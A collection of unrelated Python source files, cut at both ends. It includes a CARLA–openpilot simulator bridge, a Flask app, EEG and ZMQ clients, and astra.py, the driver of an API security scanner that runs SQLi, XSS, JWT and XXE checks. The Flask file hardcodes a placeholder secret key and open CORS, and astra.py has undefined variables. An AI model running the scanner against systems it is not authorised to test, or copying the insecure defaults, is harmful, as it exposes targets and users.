self._server_loop.call_soon_threadsafe(self._server_loop.stop)
async def _handle_request(self, request: web.Request) -> web.Response:
"""Handle an incoming request."""
event = await request.json()
# This handler will be called on the server thread. Call the external
# handler on the app thread.
self._main_loop.call_soon_threadsafe(self.handle_event, event)
return web.Response(text="OK")
def _run(self) -> None:
"""Execute the server in its own thread with its own event loop."""
asyncio.set_event_loop(self._server_loop)
self._server_loop.run_until_complete(self._runner.setup())
site = web.TCPSite(self._runner, self.host, self.port)
self._server_loop.run_until_complete(site.start())
# If the Server was initialized with port 0, determine what port the
# underlying server ended up listening on
if self.port == 0:
site_server = cast(asyncio.AbstractServer, site._server)
sockets = cast(List[Socket], site_server.sockets)
socket = sockets[0]
self.port = socket.getsockname()[1]
self._startup_event.set()
self._server_loop.run_forever()
async def _stop(self) -> None:
"""Stop the server."""
await self._runner.shutdown()
await self._runner.cleanup()
def create_server(
handle_event: EventCallback, host: str = "0.0.0.0", port: int = 0
) -> Server:
"""Create a new server."""
return Server(handle_event, host, port)
|
bridge.py
|
#!/usr/bin/env python3
import time
import math
import atexit
import numpy as np
import threading
import random
import cereal.messaging as messaging
import argparse
from common.params import Params
from common.realtime import Ratekeeper
from lib.can import can_function, sendcan_function
from lib.helpers import FakeSteeringWheel
from selfdrive.car.honda.values import CruiseButtons
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--autopilot', action='store_true')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--realmonitoring', action='store_true')
args = parser.parse_args()
pm = messaging.PubMaster(['frame', 'sensorEvents', 'can'])
W,H = 1164, 874
def cam_callback(image):
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0,1,2]].copy()
dat = messaging.new_message('frame')
dat.frame = {
"frameId": image.frame,
"image": img.tostring(),
"transform": [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
}
pm.send('frame', dat)
def imu_callback(imu):
#print(imu, imu.accelerometer)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def health_function():
pm = messaging.PubMaster(['health'])
rk = Ratekeeper(1.0)
while 1:
dat = messaging.new_message('health')
dat.valid = True
dat.health = {
'ignitionLine': True,
'hwType': "whitePanda",
'controlsAllowed': True
}
pm.send('health', dat)
rk.keep_time()
def fake_driver_monitoring():
if args.realmonitoring:
return
pm = messaging.PubMaster(['driverState'])
while 1:
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
time.sleep(0.1)
def go(q):
threading.Thread(target=health_function).start()
threading.Thread(target=fake_driver_monitoring).start()
import carla
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(5.0)
world = client.load_world('Town04')
settings = world.get_settings()
settings.fixed_delta_seconds = 0.05
world.apply_settings(settings)
weather = carla.WeatherParameters(
cloudyness=0.1,
precipitation=0.0,
precipitation_deposits=0.0,
wind_intensity=0.0,
sun_azimuth_angle=15.0,
sun_altitude_angle=75.0)
world.set_weather(weather)
blueprint_library = world.get_blueprint_library()
"""
for blueprint in blueprint_library.filter('sensor.*'):
print(blueprint.id)
exit(0)
"""
world_map = world.get_map()
vehicle_bp = random.choice(blueprint_library.filter('vehicle.tesla.*'))
vehicle = world.spawn_actor(vehicle_bp, world_map.get_spawn_points()[16])
# make tires less slippery
wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 1326
physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
if args.autopilot:
vehicle.set_autopilot(True)
# print(vehicle.get_speed_limit())
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.45))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(imu_callback)
def destroy():
print("clean exit")
imu.destroy()
camera.destroy()
vehicle.destroy()
print("done")
atexit.register(destroy)
# can loop
sendcan = messaging.sub_sock('sendcan')
rk = Ratekeeper(100, print_delay_threshold=0.05)
# init
A_throttle = 2.
A_brake = 2.
A_steer_torque = 1.
fake_wheel = FakeSteeringWheel()
is_openpilot_engaged = False
in_reverse = False
throttle_out = 0
brake_out = 0
steer_angle_out = 0
while 1:
cruise_button = 0
# check for a input message, this will not block
if not q.empty():
print("here")
message = q.get()
m = message.split('_')
if m[0] == "steer":
steer_angle_out = float(m[1])
fake_wheel.set_angle(steer_angle_out) # touching the wheel overrides fake wheel angle
# print(" === steering overriden === ")
if m[0] == "throttle":
throttle_out = float(m[1]) / 100.
if throttle_out > 0.3:
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
if m[0] == "brake":
brake_out = float(m[1]) / 100.
if brake_out > 0.3:
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
if m[0] == "reverse":
in_reverse = not in_reverse
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
if m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
if m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
if m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) * 3.6
can_function(pm, speed, fake_wheel.angle, rk.frame, cruise_button=cruise_button, is_engaged=is_openpilot_engaged)
if rk.frame%1 == 0: # 20Hz?
throttle_op, brake_op, steer_torque_op = sendcan_function(sendcan)
# print(" === torq, ",steer_torque_op, " ===")
if is_openpilot_engaged:
fake_wheel.response(steer_torque_op * A_steer_torque, speed)
throttle_out = throttle_op * A_throttle
brake_out = brake_op * A_brake
steer_angle_out = fake_wheel.angle
# print(steer_torque_op)
# print(steer_angle_out)
vc = carla.VehicleControl(throttle=throttle_out, steer=steer_angle_out / 3.14, brake=brake_out, reverse=in_reverse)
vehicle.apply_control(vc)
rk.keep_time()
if __name__ == "__main__":
params = Params()
params.delete("Offroad_ConnectivityNeeded")
from selfdrive.version import terms_version, training_version
params.put("HasAcceptedTerms", terms_version)
params.put("CompletedTrainingVersion", training_version)
params.put("CommunityFeaturesToggle", "1")
params.put("CalibrationParams", '{"vanishing_point": [582.06, 442.78], "valid_blocks": 20}')
# no carla, still run
try:
import carla
except ImportError:
print("WARNING: NO CARLA")
while 1:
time.sleep(1)
from multiprocessing import Process, Queue
q = Queue()
p = Process(target=go, args=(q,))
p.daemon = True
p.start()
if args.joystick:
# start input poll for joystick
from lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
else:
# start input poll for keyboard
from lib.keyboard_ctrl import keyboard_poll_thread
keyboard_poll_thread(q)
|
__init__.py
|
from server.utils.settings_utils import get_ip4_addresses
from flask import Flask, url_for
from flask.helpers import send_from_directory
from flask_socketio import SocketIO
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_cors import CORS
from werkzeug.utils import secure_filename
import os
from time import sleep, time
from dotenv import load_dotenv
import logging
from threading import Thread
from server.utils import settings_utils, software_updates, migrations
# Updating setting files (will apply changes only when a new SW version is installed)
settings_utils.update_settings_file_version()
# Shows ipv4 adresses
print("\nTo run the server use 'ip:5000' in your browser with one of the following ip adresses: {}\n".format(str(get_ip4_addresses())), flush=True)
# Logging setup
load_dotenv()
level = os.getenv("FLASK_LEVEL")
if not level is None:
level = int(level)
else:
level = 0
settings_utils.print_level(level, "app")
logging.getLogger("werkzeug").setLevel(level)
# app setup
# is using the frontend build forlder for the static path
app = Flask(__name__, template_folder='templates', static_folder="../frontend/build", static_url_path="/")
app.config['SECRET_KEY'] = 'secret!' # TODO put a key here
app.config['UPLOAD_FOLDER'] = "./server/static/Drawings"
socketio = SocketIO(app, cors_allowed_origins="*")
CORS(app) # setting up cors for react
#
@app.route('/Drawings/<path:filename>')
def base_static(filename):
filename = secure_filename(filename)
return send_from_directory(app.root_path + app.config['UPLOAD_FOLDER'].replace("./server", "")+ "/{}/".format(filename), "{}.jpg".format(filename))
# database
file_path = os.path.join(os.path.abspath(os.getcwd()), "database.db")
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+file_path
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
migrate = Migrate(app, db, include_object=migrations.include_object)
# After setting up the database it is possible to import the app components
import server.api.drawings
import server.sockets_interface.socketio_callbacks
from server.sockets_interface.socketio_emits import SocketioEmits
from server.hw_controller.queue_manager import QueueManager
from server.hw_controller.feeder import Feeder
from server.hw_controller.feeder_event_manager import FeederEventManager
# Commenting out leds part. TODO finish the leds part
# Needs to uncomment also in the socket callbacks: in settings_save and in leds_set_color
#from server.hw_controller.leds.leds_controller import LedsController
#from server.hw_controller.leds.leds_driver import LedsDriver
# Initializes sockets emits
app.semits = SocketioEmits(app,socketio, db)
# Device controller initialization
app.feeder = Feeder(FeederEventManager(app))
#app.feeder.connect()
app.qmanager = QueueManager(app, socketio)
#app.leds_controller = LedsController(app)
#app.leds_controller.start()
# Get lates commit short hash to use as a version to refresh cached files
sw_version = software_updates.get_commit_shash()
@app.context_processor
def override_url_for():
return dict(url_for=versioned_url_for)
# Adds a version number to the static url to update the cached files when a new version of the software is loaded
def versioned_url_for(endpoint, **values):
if endpoint == 'static':
values["version"] = sw_version
return url_for(endpoint, **values)
# Home routes
@app.route('/')
def home():
return send_from_directory(app.static_folder, "index.html")
# Starting the feeder after the server is ready to avoid problems with the web page not showing up
def run_post():
sleep(2)
app.feeder.connect()
th = Thread(target = run_post)
th.name = "feeder_starter"
th.start()
if __name__ == '__main__':
socketio.run(app)
|
extract.py
|
from .muse import Muse
from .models import Sample
import time
from multiprocessing import Process, Queue
def _target(queue, address=None, backend=None, interface=None, name=None):
def add_to_queue(data, timestamps):
for i in range(12):
queue.put(Sample(timestamps[i], data[:, i]))
try:
muse = Muse(
address=address,
callback=add_to_queue,
backend=backend,
interface=interface,
name=name
)
muse.connect()
muse.start()
try:
while True:
time.sleep(1)
finally:
muse.stop()
muse.disconnect()
except Exception as e:
queue.put(e)
def get_raw(timeout=15, **kwargs):
q = Queue()
p = Process(target=_target, args=(q,), kwargs=kwargs)
p.daemon = True
p.start()
while True:
item = q.get(timeout=timeout)
if isinstance(item, Exception):
raise item
else:
yield item
|
astra.py
|
import argparse
import base64
import json
import requests
import time
import ast
import utils.logger as logger
import utils.logs as logs
import urlparse
import hashlib
import webbrowser
from core.zapscan import *
from core.parsers import *
from utils.logger import *
from core.login import APILogin
from utils.logger import logger
from utils.config import update_value,get_value,get_allvalues
from modules.cors import cors_main
from modules.auth import auth_check
from modules.rate_limit import rate_limit
from modules.csrf import csrf_check
from modules.jwt_attack import jwt_check
from modules.sqli import sqli_check
from modules.xss import xss_check
from modules.redirect import open_redirect_check
from modules.xxe import xxe_scan
from modules.crlf import crlf_check
from core.zap_config import zap_start
from multiprocessing import Process
from utils.db import Database_update
if os.getcwd().split('/')[-1] != 'API':
from API.api import main
dbupdate = Database_update()
def parse_collection(collection_name,collection_type):
if collection_type == 'Postman':
parse_data.postman_parser(collection_name)
else:
print "[-]Failed to Parse collection"
sys.exit(1)
def scan_complete():
print "[+]Scan has been completed"
webbrowser.open("http://127.0.0.1:8094/reports.html#"+scanid)
while True:
pass
def generate_scanid():
global scanid
scanid = hashlib.md5(str(time.time())).hexdigest()
return scanid
def add_headers(headers):
# This function deals with adding custom header and auth value .
auth_type = get_value('config.property','login','auth_type')
if auth_type == 'cookie':
cookie = get_value('config.property','login','cookie')
if cookie:
cookie_dict = ast.literal_eval(cookie)
cookie_header = {'Cookie': cookie_dict['cookie']}
headers.update(cookie_header)
else:
auth_success = get_value('config.property','login','auth_success')
if auth_success == 'Y':
auth_success_token = get_value('config.property','login','auth_success_token')
#auth_request_header = get_value('config.property','login','auth_request_token')
auth_success_param = get_value('config.property','login','auth_success_param')
auth_header = {auth_success_param : auth_success_token }
headers.update(auth_header)
try:
custom_header = get_value('config.property','login','headers')
custom_header = ast.literal_eval(custom_header)
headers.update(custom_header)
except:
pass
return headers
def read_scan_policy():
try:
scan_policy = get_value('scan.property','scan-policy','attack')
attack = ast.literal_eval(scan_policy)
except Exception as e:
print e
print "Failed to parse scan property file."
return attack
def update_scan_status(scanid, module_name=None, count=None):
#Update scanning status and total scan of module into DB.
time.sleep(3)
if count is not None:
dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {"total_scan" : count}})
else:
dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {module_name : "Y"}})
def modules_scan(url,method,headers,body,scanid=None):
'''Scanning API using different engines '''
attack = read_scan_policy()
if attack is None:
print "Failed to start scan."
sys.exit(1)
if scanid is not None:
count = 0
for key,value in attack.items():
if value == 'Y' or value =='y':
count += 1
update_scan_status(scanid,"",count)
if attack['zap'] == "Y" or attack['zap'] == "y":
api_scan = zap_scan()
status = zap_start()
if status is True:
api_scan.start_scan(url,method,headers,body,scanid)
# Custom modules scan
if attack['cors'] == 'Y' or attack['cors'] == 'y':
cors_main(url,method,headers,body,scanid)
update_scan_status(scanid, "cors")
if attack['Broken auth'] == 'Y' or attack['Broken auth'] == 'y':
auth_check(url,method,headers,body,scanid)
update_scan_status(scanid, "auth")
if attack['Rate limit'] == 'Y' or attack['Rate limit'] == 'y':
rate_limit(url,method,headers,body,scanid)
update_scan_status(scanid, "Rate limit")
if attack['csrf'] == 'Y' or attack['csrf'] == 'y':
csrf_check(url,method,headers,body,scanid)
update_scan_status(scanid, "csrf")
if attack['jwt'] == 'Y' or attack['jwt'] == 'y':
jwt_check(url,method,headers,body,scanid)
update_scan_status(scanid, "jwt")
if attack['sqli'] == 'Y' or attack['sqli'] == 'y':
sqli_check(url,method,headers,body,scanid)
update_scan_status(scanid, "sqli")
if attack['xss'] == 'Y' or attack['xss'] == 'y':
xss_check(url,method,headers,body,scanid)
update_scan_status(scanid, "xss")
if attack['open-redirection'] == 'Y' or attack['open-redirection'] == 'y':
open_redirect_check(url,method,headers,body,scanid)
update_scan_status(scanid, "open-redirection")
if attack['xxe'] == 'Y' or attack['xxe'] == 'y':
xxe = xxe_scan()
xxe.xxe_test(url,method,headers,body,scanid)
update_scan_status(scanid, "xxe")
if attack['crlf'] == 'Y' or attack['crlf'] == 'y':
crlf_check(url,method,headers,body,scanid)
update_scan_status(scanid, "crlf")
def validate_data(url,method):
''' Validate HTTP request data and return boolean value'''
validate_url = urlparse.urlparse(url)
http_method = ['GET','POST','DEL','OPTIONS','PUT']
if method in http_method and bool(validate_url.scheme) is True:
validate_result = True
else:
validate_result = False
return validate_result
def scan_single_api(url, method, headers, body, api, scanid=None):
''' This function deals with scanning a single API. '''
if headers is None or headers == '':
headers = {'Content-Type' : 'application/json'}
try:
# Convert header and body in dict format
if type(headers) is not dict:
headers = ast.literal_eval(headers)
if body:
if type(body) is not dict:
body = ast.literal_eval(body)
except:
return False
if method == '':
method = 'GET'
result = validate_data(url, method)
if result is False:
print "[-]Invalid Arguments"
return False
if api == "Y":
p = Process(target=modules_scan,args=(url,method,headers,body,scanid),name='module-scan')
p.start()
if api == "Y":
return True
else:
modules_scan(url,method,headers,body,scanid)
def scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require):
''' Scan API through different engines '''
scanid = generate_scanid()
if collection_type and collection_name is not None:
parse_collection(collection_name,collection_type)
if login_require is True:
api_login.verify_login(parse_data.api_lst)
for data in parse_data.api_lst:
try:
url = data['url']['raw']
except:
url = data['url']
headers,method,body = data['headers'],data['method'],''
if headers:
try:
headers = add_headers(headers)
except:
pass
if data['body'] != '':
body = json.loads(base64.b64decode(data['body']))
modules_scan(url,method,headers,body,scanid)
else:
print "%s [-]Invalid Collection. Please recheck collection Type/Name %s" %(api_logger.G, api_logger.W)
def get_arg(args=None):
parser = argparse.ArgumentParser(description='Astra - REST API Security testing Framework')
parser.add_argument('-c', '--collection_type',
help='Type of API collection',
default='Postman')
parser.add_argument('-n', '--collection_name',
help='Type of API collection')
parser.add_argument('-u', '--url',
help='URL of target API')
parser.add_argument('-headers', '--headers',
help='Custom headers.Example: {"token" : "123"}')
parser.add_argument('-method', '--method',
help='HTTP request method',
default='GET',choices=('GET', 'POST', 'PUT','DELETE'))
parser.add_argument('-b', '--body',
help='Request body of API')
parser.add_argument('-l', '--loginurl',
help='URL of login API')
parser.add_argument('-H', '--loginheaders',
help='Headers should be in a dictionary format. Example: {"accesstoken" : "axzvbqdadf"}')
parser.add_argument('-d', '--logindata',
help='login data of API')
results = parser.parse_args(args)
if len(args) == 0:
print "%sAt least one argument is needed to procced.\nFor further information check help: %spython astra.py --help%s"% (api_logger.R, api_logger.G, api_logger.W)
sys.exit(1)
return (results.collection_type,
results.collection_name,
results.url,
results.headers,
results.method,
results.body,
results.loginurl,
results.loginheaders,
results.logindata,
)
def main():
collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata = get_arg(sys.argv[1:])
if loginheaders is None:
loginheaders = {'Content-Type' : 'application/json'}
if collection_type and collection_name and loginurl and loginmethod and logindata:
# Login data is given as an input.
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and loginurl:
# This will first find the given loginurl from collection and it will fetch auth token.
parse_collection(collection_name,collection_type)
try:
loginurl,lognheaders,loginmethod,logidata = api_login.parse_logindata(loginurl)
except:
print "[-]%s Failed to detect login API from collection %s " %(api_logger.R, api_logger.W)
sys.exit(1)
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif loginurl and loginmethod:
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url:
if headers is None:
headers = {'Content-Type' : 'application/json'}
if method is None:
method = "GET"
login_require = False
else:
login_require = True
if body:
body = ast.literal_eval(body)
# Configuring ZAP before starting a scan
get_auth = get_value('config.property','login','auth_type')
if collection_type and collection_name is not None:
scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require)
else:
scanid = generate_scanid()
scan_single_api(url, method, headers, body, "F", scanid)
scan_complete()
if __name__ == '__main__':
api_login = APILogin()
parse_data = PostmanParser()
api_logger = logger()
api_logger.banner()
main()
|
subscribers.py
|
import zmq
from .sockets import ClientConnection
from .constants import *
import threading
def subscriber(address,topics,callback,message_type):
"""
Creates a subscriber binding to the given address and
subscribe the given topics.
The callback is invoked for every message received.
Args:
- address: the address to bind the PUB socket to.
- topics: the topics to subscribe
- callback: the callback to invoke for every message. Must accept 2 variables - topic and message
- message_type: the type of message to receive
"""
return Subscriber(address,topics,callback,message_type)
class Subscriber(ClientConnection):
"""
Subscriber that can read messages from ZMQ
Args:
- address: the address to bind to
- topics: the topics to subscribe
- callback: the callback to invoke for every message
- message_type: the type of message to receive
"""
def __init__(self,address,topics,callback,message_type):
self._active = True
self._topics = topics
self._callback = callback
self._message_type = message_type
super(Subscriber,self).__init__(address,zmq.SUB)
for topic in self._topics:
self._sock.setsockopt_string(zmq.SUBSCRIBE,topic)
def _consume(self):
while self._active:
try:
topic, message=super(Subscriber,self).receive(self._message_type)
#process the message
self._callback(topic,message)
except zmq.ZMQError:
pass
def start(self):
"""
Start a thread that consumes the messages and invokes the callback
"""
t=threading.Thread(target=self._consume)
t.start()
def stop(self):
"""
Stop the consumer thread
"""
self._active = False
|
Client.py
|
import requests
import websockets
import asyncio
import threading
from .plumberhub_pb2 import Sample
from .plumberhub_pb2 import Event
def noop():
pass
class PlumberHubClient:
def __init__(
self,
hostname, port, client_id,
onready = noop,
onsample=noop, onevent = noop,
onerror=noop, onclose=noop
):
host = hostname + ':' + str(port)
self._base_url = 'http://' + host + '/api/sdk/client/' + client_id
self._running = True
self.onsample = onsample
self.onevent = onevent
self.onerror = onerror
self.onclose = onclose
self.onready = onready
# Fetching ticket
# Establishing Data / Event Channel - websocket
def listen_data(loop):
dataresponse = requests.post(self._base_url + '/session/data/ticket')
datacreeegdential = dataresponse.json()['credential']
ws_url = 'ws://' + host + '/client/' + client_id + '/session/data?credential=' + datacreeegdential
asyncio.set_event_loop(loop)
async def sample_handler():
async with websockets.connect(uri=ws_url) as ws:
while self._running:
sample = Sample()
sample.MergeFromString(await ws.recv())
self.onsample(sample)
loop.run_until_complete(sample_handler())
onclose()
def listen_event(loop):
eventresponse = requests.post(self._base_url + '/session/event/ticket')
eventcredential = eventresponse.json()['credential']
ws_url = 'ws://' + host + '/client/' + client_id + '/session/event?credential=' + eventcredential
asyncio.set_event_loop(loop)
async def event_handler():
async with websockets.connect(uri=ws_url) as ws:
while self._running:
event = Event()
event.MergeFromString(await ws.recv())
self.onevent(event)
loop.run_until_complete(event_handler())
datathread = asyncio.new_event_loop()
eventthread = asyncio.new_event_loop()
listening_datathread = threading.Thread(target=listen_data, args=(datathread,))
listening_datathread.start()
listening_eventthread = threading.Thread(target=listen_event, args=(eventthread,))
listening_eventthread.start()
def close(self):
self._running = False
def is_master(self):
response = requests.get(self._base_url + '/profile')
if response.status_code == 200:
return response.json()['isMaster']
def get_device(self):
response = requests.get(self._base_url + '/device')
if response.status_code == 200:
return response.json()
# Low-level to getting/setting device state.
def _state(self):
return self._base_url + '/device/state/'
def get(self, key):
response = requests.get(self._state() + key)
if response.status_code == 200:
return response.json()['value']
def set(self, key, value):
response = requests.put(self._state() + key, {'value': value})
if response.status_code == 200:
return response.json()['value']
# Set sampling on/off
def _busy(self):
return self._base_url + '/device/busy'
def start(self):
response = requests.put(self._busy(), json = {'value': True})
if response.status_code == 200:
return response.json()['value']
def stop(self):
response = requests.put(self._busy(), json = {'value': False})
if response.status_code == 200:
return response.json()['value']
# Sampling rate getter/setter
def _sampling_rate(self):
return self._base_url + '/device/sampling-rate'
def get_sampling_rate(self):
response = requests.get(self._sampling_rate())
if response.status_code == 200:
return response.json()['value']
def set_sampling_rate(self, value):
response = requests.put(self._sampling_rate(), {'value': value})
if response.status_code == 200:
return response.json()['value']
# Gain getter/setter
def _gain(self):
return self._base_url + '/device/gain'
def get_gain(self):
response = requests.get(self._gain())
if response.status_code == 200:
return response.json()['value']
def set_gain(self, value):
response = requests.put(self._gain(), {'value': value})
if response.status_code == 200:
return response.json()['value']
|
optimization_controller.py
|
import json
import signal
import threading
import connexion
import re
import os
import subprocess
import time
import gc
import psutil
from IO.MQTTClient import InvalidMQTTHostException
from IO.redisDB import RedisDB
from optimization.ModelException import InvalidModelException, MissingKeysException
from swagger_server.controllers.threadFactory import ThreadFactory
from swagger_server.models.start import Start # noqa: E501
from swagger_server.models.status_output import StatusOutput # noqa: E501
from optimization.idStatusManager import IDStatusManager
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
logger = MessageLogger.get_logger_parent()
class CommandController:
_instance = None
_lock = threading.Lock()
def __new__(cls):
if CommandController._instance is None:
with CommandController._lock:
if CommandController._instance is None:
CommandController._instance = super(CommandController, cls).__new__(cls)
return CommandController._instance
def __init__(self):
self.factory = {}
self.statusThread = {}
self.running = {}
self.redisDB = RedisDB()
self.lock_key = "id_lock"
def set(self, id, object):
self.factory[id] = object
def get_length_factory(self):
return len(self.factory)
def get(self, id):
return self.factory[id]
def set_isRunning(self, id, bool):
self.running[id] = bool
def isRunningExists(self):
logger.debug("IsRunning exists: " + str(len(self.running)))
if len(self.running):
return True
else:
return False
def get_isRunning(self, id):
if id in self.running.keys():
return self.running[id]
else:
return False
def get_running(self):
return self.running
def get_statusThread(self, id):
return self.statusThread[id]
def start(self, id, json_object, dict_object=None):
logger.debug(str(json_object))
if json_object is not None:
self.model_name = json_object.model_name
self.control_frequency = json_object.control_frequency
self.horizon_in_steps = json_object.horizon_in_steps
self.dT_in_seconds = json_object.d_t_in_seconds
self.repetition = json_object.repetition
self.solver = json_object.solver
self.optimization_type = json_object.optimization_type
self.single_ev = json_object.single_ev
elif dict_object is not None:
self.model_name = dict_object["model"]
self.control_frequency = dict_object["control_frequency"]
self.horizon_in_steps = dict_object["horizon_in_steps"]
self.dT_in_seconds = dict_object["dT_in_seconds"]
self.repetition = dict_object["repetition"]
self.solver = dict_object["solver"]
self.optimization_type = dict_object["optimization_type"]
self.single_ev = dict_object["single_ev"]
self.set(id,
ThreadFactory(self.model_name, self.control_frequency, self.horizon_in_steps, self.dT_in_seconds,
self.repetition, self.solver, id, self.optimization_type, self.single_ev))
logger.info("Thread: " + str(self.get(id)))
self.redisDB.set("run:" + id, "starting")
msg = self.get(id).startOptControllerThread()
logger.debug("Answer from Thread factory" + str(msg))
if msg == 0:
self.set_isRunning(id, True)
logger.debug("Flag isRunning set to True")
self.statusThread[id] = threading.Thread(target=self.run_status, args=(id,))
logger.debug("Status of the Thread started")
self.statusThread[id].start()
meta_data = {"id": id,
"model": self.model_name,
"control_frequency": self.control_frequency,
"horizon_in_steps": self.horizon_in_steps,
"dT_in_seconds": self.dT_in_seconds,
"repetition": self.repetition,
"solver": self.solver,
"optimization_type": self.optimization_type,
"single_ev": self.single_ev,
"ztarttime": time.time()}
self.redisDB.set("run:" + id, "running")
IDStatusManager.persist_id(id, True, meta_data, self.redisDB)
logger.info("running status " + str(self.running))
logger.debug("Command controller start finished")
return 0
else:
self.set_isRunning(id, False)
logger.debug("Flag isRunning set to False")
IDStatusManager.persist_id(id, False, None, self.redisDB)
self.factory[id].stopOptControllerThread()
self.redisDB.set("run:" + id, "stopped")
logger.error("Command controller start could not be finished")
# logger.debug("System stopped succesfully")
return 1
def stop(self, id):
logger.debug("Stop signal received")
logger.debug("This is the factory object: " + str(self.get(id)))
if self.factory[id]:
IDStatusManager.persist_id(id, False, None, self.redisDB)
self.factory[id].stopOptControllerThread()
del self.factory[id]
del self.statusThread[id]
#self.stop_pyro_servers()
#self.stop_name_servers()
self.set_isRunning(id, False)
message = "System stopped succesfully"
self.redisDB.set("run:" + id, "stopped")
logger.debug(message)
gc.collect()
else:
message = "No threads found"
logger.debug(message)
def run_status(self, id):
while True:
status = self.get(id).is_running()
flag = self.redisDB.get("run:" + id)
if not status or (flag is not None and flag == "stop"):
self.redisDB.set("run:" + id, "stopping")
self.stop(id)
break
time.sleep(1)
def restart_ids(self):
old_ids, stopped_ids = IDStatusManager.instances_to_restart(self.redisDB)
for s in old_ids:
val = json.loads(s)
try:
self.start(val["id"], None, val)
except (InvalidModelException, MissingKeysException, InvalidMQTTHostException) as e:
# TODO: should we catch these exceptions here?
logger.error("Error " + str(e))
self.redisDB.set("run:" + val["id"], "stopped")
return str(e)
for s in stopped_ids:
val = json.loads(s)
id = val["id"]
self.redisDB.set("run:" + id, "stopped")
self.redisDB.set(Constants.id_meta + ":" + id, json.dumps(val))
def get_status(self):
status = {}
keys = self.redisDB.get_keys_for_pattern("run:*")
if keys is not None:
for key in keys:
value = self.redisDB.get(key)
id = key[4:]
status[id] = {}
if value is None or (value is not None and value == "stopped"):
status[id]["status"] = "stopped"
elif value == "running":
status[id]["status"] = "running"
elif value == "stop" or value == "stopping":
status[id]["status"] = "stopping"
elif value == "starting":
status[id]["status"] = "starting"
keys = self.redisDB.get_keys_for_pattern(Constants.id_meta + ":*")
if keys is not None:
for key in keys:
value = self.redisDB.get(key)
id = key[8:]
if id not in status.keys():
status[id] = {}
status[id]["status"] = "stopped"
status[id]["config"] = {}
if value is not None:
status[id]["config"].update(json.loads(value))
# logger.debug("status id config "+str(status))
if "ztarttime" in status[id]["config"].keys():
status[id]["start_time"] = status[id]["config"]["ztarttime"]
status[id]["config"].pop("ztarttime")
if "model" in status[id]["config"].keys():
status[id]["config"]["model_name"] = status[id]["config"]["model"]
status[id]["config"].pop("model")
return status
variable = CommandController()
variable.restart_ids()
def get_models():
f = []
mypath = "/usr/src/app/optimization/models"
for (dirpath, dirnames, filenames) in os.walk(mypath):
f.extend(filenames)
break
f_new = []
for filenames in f:
filenames = re.sub('.py', '', str(filenames))
f_new.append(filenames)
logger.debug("available models = " + str(f_new))
return f_new
def framework_start(id, startOFW): # noqa: E501
"""Command for starting the framework
# noqa: E501
:param id: Id of the registry to be started
:type id: str
:param startOFW: Start command for the optimization framework repetitions: -1 infinite repetitions
:type startOFW: dict | bytes
:rtype: None
"""
available_solvers = ["ipopt", "glpk", "bonmin", "gurobi", "cbc"]
available_optimizers = ["discrete", "stochastic", "MPC"]
response_msg = ""
response_code = 200
if connexion.request.is_json:
logger.info("Starting the system")
startOFW = Start.from_dict(connexion.request.get_json())
models = get_models()
if startOFW.model_name != "" and startOFW.model_name not in models:
response_msg = "Model not available. Available models are :" + str(models)
response_code = 400
elif startOFW.solver not in available_solvers:
response_msg = "Use one of the following solvers :" + str(available_solvers)
response_code = 400
elif startOFW.optimization_type not in available_optimizers:
